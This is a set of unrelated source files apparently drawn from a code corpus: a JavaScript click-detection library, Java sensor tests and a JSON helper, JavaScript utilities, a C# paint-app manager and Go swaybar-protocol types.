* clicked('#clickme', handleClick2)

*

* // watching for all types of clicks

* function handleAllClicks(e) {

* switch (e.type)

* {

* case 'clicked': ...

* case 'double-clicked': ...

* case 'long-clicked': ...

* }

*

* // view UIEvent that caused callback

* console.log(e.event)

* }

* clicked('#clickme', handleAllClicks, { doubleClicked: true, longClicked: true })

*/

var __assign = (this && this.__assign) || function () {

__assign = Object.assign || function(t) {

for (var s, i = 1, n = arguments.length; i < n; i++) {

s = arguments[i];

for (var p in s) if (Object.prototype.hasOwnProperty.call(s, p))

t[p] = s[p];

}

return t;

};

return __assign.apply(this, arguments);

};

var defaultOptions = {

threshold: 10,

clicked: true,

mouse: true,

touch: true,

doubleClicked: false,

doubleClickedTime: 300,

longClicked: false,

longClickedTime: 500,

capture: false,

clickDown: false

};

/**

* @param element element or querySelector entry (e.g., #id-name or .class-name)

* @param callback called after a click, double click, or long click is registered

* @param [options]

* @param [options.threshold=10] threshold of movement to cancel all events

* @param [options.clicked=true] dispatch event for clicked

* @param [options.mouse=true] whether to listen for mouse events; can also be used to set which mouse buttons are active

* @param [options.touch=true] whether to listen for touch events; can also be used to set the number of touch points to accept

* @param [options.doubleClicked] dispatch event for double click

* @param [options.doubleClickedTime=300] wait time in milliseconds for double click

* @param [options.longClicked] dispatch event for long click

* @param [options.longClickedTime=500] wait time in milliseconds for long click

* @param [options.clickDown] dispatch event for click down

* @param [options.capture] events will be dispatched to this registered listener before being dispatched to any EventTarget beneath it in the DOM tree

*/

export function clicked(element, callback, options) {

return new Clicked(element, callback, options);

}

var Clicked = /** @class */ (function () {

function Clicked(element, callback, options) {

if (typeof element === 'string') {

var selector = element;

element = document.querySelector(selector);

if (!element) {

// report the original selector, not the null lookup result

console.warn("Unknown element: document.querySelector(" + selector + ") in clicked()");

return;

}

}

this.element = element;

this.callback = callback;

this.options = __assign(__assign({}, defaultOptions), options);

this.createListeners();

}

Clicked.prototype.createListeners = function () {

var _this = this;

this.events = {

mousedown: function (e) { return _this.mousedown(e); },

mouseup: function (e) { return _this.mouseup(e); },

mousemove: function (e) { return _this.mousemove(e); },

touchstart: function (e) { return _this.touchstart(e); },

touchmove: function (e) { return _this.touchmove(e); },

touchcancel: function () { return _this.cancel(); },

touchend: function (e) { return _this.touchend(e); }

};

this.element.addEventListener('mousedown', this.events.mousedown, { capture: this.options.capture });

this.element.addEventListener('mouseup', this.events.mouseup, { capture: this.options.capture });

this.element.addEventListener('mousemove', this.events.mousemove, { capture: this.options.capture });

this.element.addEventListener('touchstart', this.events.touchstart, { passive: true, capture: this.options.capture });

this.element.addEventListener('touchmove', this.events.touchmove, { passive: true, capture: this.options.capture });

this.element.addEventListener('touchcancel', this.events.touchcancel, { capture: this.options.capture });

this.element.addEventListener('touchend', this.events.touchend, { capture: this.options.capture });

};

/** removes event listeners added by Clicked */

Clicked.prototype.destroy = function () {

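// capture must match the value passed to addEventListener, otherwise the listeners are not removed

var listenerOptions = { capture: this.options.capture };

this.element.removeEventListener('mousedown', this.events.mousedown, listenerOptions);

this.element.removeEventListener('mouseup', this.events.mouseup, listenerOptions);

this.element.removeEventListener('mousemove', this.events.mousemove, listenerOptions);

this.element.removeEventListener('touchstart', this.events.touchstart, listenerOptions);

this.element.removeEventListener('touchmove', this.events.touchmove, listenerOptions);

this.element.removeEventListener('touchcancel', this.events.touchcancel, listenerOptions);

this.element.removeEventListener('touchend', this.events.touchend, listenerOptions);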

};

Clicked.prototype.touchstart = function (e) {

if (this.down === true) {

this.cancel();

}

else {

if (e.touches.length === 1) {

this.handleDown(e, e.changedTouches[0].screenX, e.changedTouches[0].screenY);

}

}

};

Clicked.prototype.pastThreshold = function (x, y) {

return Math.abs(this.lastX - x) > this.options.threshold || Math.abs(this.lastY - y) > this.options.threshold;

};

Clicked.prototype.touchmove = function (e) {

if (this.down) {

if (e.touches.length !== 1) {

this.cancel();

}

else {

var x = e.changedTouches[0].screenX;

var y = e.changedTouches[0].screenY;

if (this.pastThreshold(x, y)) {

this.cancel();

}

}

}

};

/** cancel current event */

Clicked.prototype.cancel = function () {

this.down = false;

if (this.doubleClickedTimeout) {

clearTimeout(this.doubleClickedTimeout);

this.doubleClickedTimeout = null;

}

if (this.longClickedTimeout) {

clearTimeout(this.longClickedTimeout);

this.longClickedTimeout = null;

}

};

Clicked.prototype.touchend = function (e) {

if (this.down) {

e.preventDefault();

this.handleClicks(e);

}

};

Clicked.prototype.handleClicks = function (e) {

var _this = this;

if (this.options.doubleClicked) {

this.doubleClickedTimeout = this.setTimeout(function () { return _this.doubleClickedCancel(e); }, this.options.doubleClickedTime);

}

else if (this.options.clicked) {

this.callback({ event: e, type: 'clicked' });

}

if (this.longClickedTimeout) {

clearTimeout(this.longClickedTimeout);

this.longClickedTimeout = null;

}

this.down = false;

};

Clicked.prototype.handleDown = function (e, x, y) {

var _this = this;

if (this.doubleClickedTimeout) {

if (this.pastThreshold(x, y)) {

if (this.options.clicked) {

this.callback({ event: e, type: 'clicked' });

}

this.cancel();

}

else {

this.callback({ event: e, type: 'double-clicked' });

this.cancel();

}

}

else {

this.lastX = x;

this.lastY = y;

this.down = true;

if (this.options.longClicked) {

this.longClickedTimeout = this.setTimeout(function () { return _this.longClicked(e); }, this.options.longClickedTime);

}

if (this.options.clickDown) {

this.callback({ event: e, type: 'click-down' });

}

}

};

Clicked.prototype.longClicked = function (e) {

this.longClickedTimeout = null;

this.down = false;

this.callback({ event: e, type: 'long-clicked' });

};

Clicked.prototype.doubleClickedCancel = function (e) {

this.doubleClickedTimeout = null;

if (this.options.clicked) {

this.callback({ event: e, type: 'clicked' });

}

};

Clicked.prototype.checkMouseButtons = function (e) {

if (this.options.mouse === false) {

return false;

}

else if (this.options.mouse === true) {

return true;

}

else if (e.button === 0) {

return this.options.mouse.includes('left');

}

else if (e.button === 1) {

return this.options.mouse.includes('middle');

}

else if (e.button === 2) {

return this.options.mouse.includes('right');

}

};

Clicked.prototype.mousedown = function (e) {

if (this.checkMouseButtons(e)) {

if (this.down === true) {

this.down = false;

}

else {

this.handleDown(e, e.screenX, e.screenY);

}

}

};

Clicked.prototype.mousemove = function (e) {

if (this.down) {

var x = e.screenX;

var y = e.screenY;

if (this.pastThreshold(x, y)) {

this.cancel();

}

}

};

Clicked.prototype.mouseup = function (e) {

if (this.down) {

e.preventDefault();

this.handleClicks(e);

}

};

Clicked.prototype.setTimeout = function (callback, time) {

return setTimeout(callback, time);

};

return Clicked;

}());

export { Clicked };

/**

* Callback for

* @callback Clicked~ClickedCallback

* @param {UIEvent} event

* @param {('clicked'|'double-clicked'|'long-clicked'|'click-down')} type

*/

|

Java

|

UTF-8

| 1,147 | 2.625 | 3 |

[] |

no_license

|

package com.example.asuper.gesturerecognizer.sensor;

import org.junit.Test;

import static org.hamcrest.CoreMatchers.*;

import static org.junit.Assert.*;

public class SensorDataRegulatorTest {

@Test

public void correctAverageData() {

SensorDataRegulator regulator = new SensorDataRegulator();

regulator.pushData(new float[]{1, 1, 1});

regulator.pushData(new float[]{1, 1, 1});

regulator.pushData(new float[]{1, 1, 1});

float[] data = regulator.getAverageData();

assertThat(data, equalTo(new float[]{1, 1, 1}));

}

@Test

public void listCleaningNeeded() {

SensorDataRegulator regulator = new SensorDataRegulator();

regulator.pushData(new float[]{1, 1, 1});

regulator.pushData(new float[]{1, 1, 1});

regulator.pushData(new float[]{1, 1, 1});

regulator.getAverageData();

regulator.pushData(new float[]{2, 1, 1});

regulator.pushData(new float[]{2, 1, 1});

regulator.pushData(new float[]{2, 1, 1});

float[] data = regulator.getAverageData();

assertThat(data, equalTo(new float[]{2, 1, 1}));

}

}

|

Java

|

UTF-8

| 497 | 2.21875 | 2 |

[] |

no_license

|

package cn.mobiledaily.domain;

import com.fasterxml.jackson.core.JsonProcessingException;

import com.fasterxml.jackson.databind.ObjectMapper;

public final class Converter {

private static final ObjectMapper MAPPER = new ObjectMapper();

public static String toJson(Object object) {

try {

return MAPPER.writeValueAsString(object);

} catch (JsonProcessingException e) {

throw new IllegalStateException("Cannot convert object to JSON.", e);

}

}

}

|

JavaScript

|

UTF-8

| 1,907 | 2.953125 | 3 |

[] |

no_license

|

"use strict";

module.exports = {

guid: function() {

return Math.floor( ( 1 + Math.random() ) * 0x10000 ).toString( 16 );

},

clone: function( obj ){

var clone = {};

if( obj === null || typeof( obj ) !== "object" ){

return obj;

}

for( var i in obj ){

if( obj.hasOwnProperty( i ) && typeof( obj[i] ) === "object" && obj[i] !== null ){

clone[i] = this.clone( obj[i] );

}

else {

clone[i] = obj[i];

}

}

return clone;

},

uniqueElementById: function( arrayUnique, arrayToAdd ){

for( var i = 0; i < arrayToAdd.length; i++ ){

var item = arrayToAdd[i];

var isNew = false;

if( arrayUnique.length === 0 ){

arrayUnique.push( item );

}

else {

isNew = true;

for( var j = 0; j < arrayUnique.length; j++ ){

var uniqueItem = arrayUnique[j];

if( uniqueItem.id === item.id ){

isNew = false;

}

}

}

if( isNew ){

arrayUnique.push(item);

}

}

return arrayUnique;

},

dateToString : function( date ){

var dayOfMonth = (date.getDate() < 10) ? "0" + date.getDate() : date.getDate() ;

// getMonth() is zero-based (January = 0), so add 1 for display

var month = (date.getMonth() + 1 < 10) ? "0" + (date.getMonth() + 1) : date.getMonth() + 1;

var curHour = date.getHours() < 10 ? "0" + date.getHours() : date.getHours();

var curMinute = date.getMinutes() < 10 ? "0" + date.getMinutes() : date.getMinutes();

var curSeconds = date.getSeconds() < 10 ? "0" + date.getSeconds() : date.getSeconds();

return curHour + "h:" + curMinute + "m:" + curSeconds + "s " + dayOfMonth + "/" + month;

}

};

|

C#

|

UTF-8

| 2,879 | 2.546875 | 3 |

[] |

no_license

|

using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using UJEP_WinformPainting.Classes.ColorCon;
using UJEP_WinformPainting.Classes.Managers.LivePreview;
using UJEP_WinformPainting.Classes.Managers.Memory;
using UJEP_WinformPainting.Classes.PaitingObjects;
using UJEP_WinformPainting.Classes.Tools;

namespace UJEP_WinformPainting.Classes.Managers.Main
{
    public class MainManager : ILivePreview
    {
        public readonly IPaintingMemoryManager MemoryManager;

        public Tool SelectedTool { get; set; }

        public PaintingObject SelectedObject { get; set; }

        public ColorContainer SelecedColorContainer { get; private set; }

        public MainManager(IPaintingMemoryManager memoryManager)
        {
            this.MemoryManager = memoryManager;
            this.SelectedTool = Tool.Default;
            this.SelecedColorContainer = ColorContainer.Default;
        }

        // Updates the object being previewed to follow the current mouse position.
        public void UpdatePreview(Point currentMousePosition, PaintingObject paintingObject)
        {
            if (paintingObject != null)
                paintingObject.Update(currentMousePosition);
        }

        // Moves the object by the mouse offset between the previous and current positions.
        public void UpdatePosition(Point currentPosition, Point previousPosition, PaintingObject paintingObject)
        {
            if (paintingObject == null)
                return;

            var move = new Point(currentPosition.X - previousPosition.X, currentPosition.Y - previousPosition.Y);
            paintingObject.UpdatePosition(move);
        }

        public bool IsMovingObject()
        {
            return SelectedObject != null && !SelectedObject.IsBeingCreated;
        }

        public void BeginPreview(PaintingObject paintingObject)
        {
            MemoryManager.Add(paintingObject);
            SelectedObject = paintingObject;
        }

        public void EndPreview()
        {
            // Guard against nothing being selected.
            if (SelectedObject != null)
                SelectedObject.IsBeingCreated = false;

            SelectedObject = null;
        }

        // The grab tool selects an existing object; any other tool starts drawing a new one.
        public void BeginPreview(Point mousePosition)
        {
            if (IsGrabTool())
                SetSelectedObject(mousePosition);
            else
                BeginDrawing(mousePosition);
        }

        private void SetSelectedObject(Point mousePosition)
        {
            SelectedObject = MemoryManager.GetObjectOnPosition(mousePosition);
        }

        private void BeginDrawing(Point mousePosition)
        {
            var paintingObject = SelectedTool.PaintingObject.GetInstance(mousePosition, SelecedColorContainer);
            BeginPreview(paintingObject);
        }

        private bool IsGrabTool()
        {
            return SelectedTool is GrabTool;
        }

        public void SetSelectedColor(Color color)
        {
            // For a different stroke width, it is enough to adjust the pen size.
            SelecedColorContainer = new ColorContainer(new SolidBrush(color), new Pen(color), color);
        }
    }
}

|

Go

|

UTF-8

| 1,169 | 2.515625 | 3 |

[

"MIT"

] |

permissive

|

// See swaybar-protocol(7).
package swaybar

// Header represents a swaybar-protocol header.
type Header struct {
	Version     int
	ClickEvents bool
	ContSignal  int
	StopSignal  int
}

// Body represents a swaybar-protocol body.
type Body struct {
	StatusLines []StatusLine
}

// StatusLine holds the Blocks that make up one complete swaybar status line.
type StatusLine struct {
	Blocks []Block
}